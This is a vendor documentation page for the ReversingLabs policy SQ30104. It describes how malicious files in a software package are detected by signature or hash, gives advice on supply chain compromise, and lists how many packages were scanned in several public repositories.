SQ30104
Detected presence of malicious files by a dedicated signature.
| priority | CI/CD status | severity | effort | RL level | RL assessment |
|---|---|---|---|---|---|
 | fail | high | high | 1 | malware: fail Reason: malicious components found |
About the issueโ
Proprietary ReversingLabs malware detection algorithms have determined that the software package contains one or more malicious files. The detection was made by either a static byte signature or a complete file hash. This malware detection method is considered highly accurate, and can typically identify the malware family by name.
How to resolve the issueโ
- If the software intent does not relate to malicious behavior, investigate the build and release environment for software supply chain compromise.
- Avoid using this software package.
Incidence statisticsโ
ReversingLabs periodically collects and analyzes the contents of popular software package repositories for threat research purposes.
For every repository, the chart shows the percentage of projects that triggered the software assurance policy. In other words, it shows how many projects were found to have the specific issue described on this page.
The percentages are calculated from the total amount of packages analyzed:
- RubyGems: 174K
- Nuget: 189K
- PyPi: 403K
- NPM: 2.1M
Recommended readingโ
- File signature (External resource - Wikipedia)
- What is a file signature? (External resource - threat.media)